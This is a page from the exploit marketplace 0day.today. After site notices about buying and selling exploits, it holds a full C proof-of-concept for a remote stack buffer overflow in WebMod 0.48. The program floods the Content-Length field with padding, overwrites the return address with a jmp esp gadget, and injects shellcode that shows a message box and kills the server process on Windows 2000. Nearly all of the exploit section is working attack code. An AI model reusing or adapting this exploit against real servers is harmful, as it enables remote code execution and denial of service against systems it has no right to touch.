0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC
=============================================================== WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC =============================================================== /* * WebMod Stack Buffer Overflow * * by cybermind (Kevin Masterson) * cybermind@gmail.com * * WebMod v0.48 exploit PoC code * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <winsock.h> #pragma comment (lib, "ws2_32.lib") /* local variables in connectHandle(): char *input; 4 char buf[8192+1]; 8193 int i,j; 8 int connfd; 4 int myid; 4 threaddata_t *tdata; 4 httpquery_t query; 149036 char tmp[1025]; 1025 int rcv; 4 char clbuf[11]; 11 total: 158293 actual (due to padding): 158308 breakdown of types: typedef struct s_var { 546 char name[33]; 33 char value[513]; 513 } var_s; typedef struct s_httpquery { 149036 char method[11]; 11 char clientip[16]; 16 char url[257]; 257 char *get; 4 char *post; 4 char *cookies; 4 var_s vars[256]; 139776 char currentmapname[257]; 257 char sendcookies[8192+1]; 8193 char contenttype[257]; 257 char location[257]; 257 } httpquery_t; */ //contains data to fill the Content-Length field with char spambuf[20000]; //code to inject //this particular code only works on Win2K SP4 (v5.0.4.0) //and kernel32.dll v5.0.2195.6688 unsigned char code[] = { // ; push string onto the stack without using 0x00 0xB8, 0x59, 0x5A, 0x32, 0x11, //mov eax, 11325A59h ; "HI!\0" + 11111111h 0x2D, 0x11, 0x11, 0x11, 0x11, //sub eax, 11111111h 0x50, //push eax 0x8B, 0xC4, //mov eax, esp ; eax points to string 0x33, 0xC9, //xor ecx, ecx ; zero // ; call MessageBox 0x51, //push ecx ; flags (0) 0x50, //push eax ; caption 0x50, //push eax ; text 0x51, //push ecx ; hwnd (0) 0xB8, 0x98, 0x80, 0xE3, 0x77, //mov eax, 77E38098h ; &MessageBox 0xFF, 0xD0, //call eax // ; call GetCurrentProcessId 0xB8, 0xF4, 0xB8, 0x4E, 0x7C, //mov eax, 7C4EB8F4h ; &GetCurrentProcessId 0xFF, 0xD0, //call eax 0x33, 0xC9, //xor ecx, ecx ; zero // ; call TerminateProcess 0x51, //push ecx ; return code (0) 0x50, //push eax ; process id 0xB8, 0xC3, 0x8D, 0x51, 0x7C, //mov eax, 7C518DC3h ; &TerminateProcess 0xFF, 0xD0 //call eax }; //EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll //set this to 0xFFFFFFFF to just cause a crash unsigned int our_eip = 0x67E03C5B; int main(int argc, char* argv[]) { WSADATA wsadata; int sock = 0; struct hostent* host = NULL; struct sockaddr_in saddr; //data to sent initially char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: "; //data to send after headers char endbuf[] = "\n\n"; char* hostname = NULL; short hostport = 27015; int i; unsigned int sent = 0; //get host/port from command line if (argc < 2) { printf("Usage:\t%s <hostname|ip> [port=27015]\n", argv[0]); return 1; } hostname = argv[1]; if (argc >= 3) hostport = atoi(argv[2]); WSAStartup(MAKEWORD(1,1), &wsadata); sock = socket(AF_INET, SOCK_STREAM, 0); if (sock <= 0) { printf("socket() error\n"); return 1; } host = gethostbyname(hostname); if (!host) { printf("gethostbyname() error\n"); return 1; } printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0])); memset(&saddr, 0, sizeof(struct sockaddr_in)); saddr.sin_family = AF_INET; saddr.sin_port = htons(hostport); memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length); if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) { printf("connect() error\n"); return 1; } //initialize buffers memset(spambuf, 'a', sizeof(spambuf)); //send initial POST request sent += send(sock, initbuf, sizeof(initbuf)-1, 0); //send 7 full spambufs to get 140000 bytes for (i = 0; i < 7; ++i) sent += send(sock, spambuf, sizeof(spambuf), 0); //send partial spambuf to fill remaining data //(18308, this goes right up to the EIP) sent += send(sock, spambuf, 18308, 0); //fill EIP sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0); //insert code! sent += send(sock, (char*)code, sizeof(code), 0); //send newlines after content-length sent += send(sock, endbuf, sizeof(endbuf)-1, 0); printf("%u bytes sent...waiting...\n", sent); //wait for a while so the socket isn't closed on our end //before they receive all the data Sleep(15000); return 0; } # 0day.today [2024-12-25] #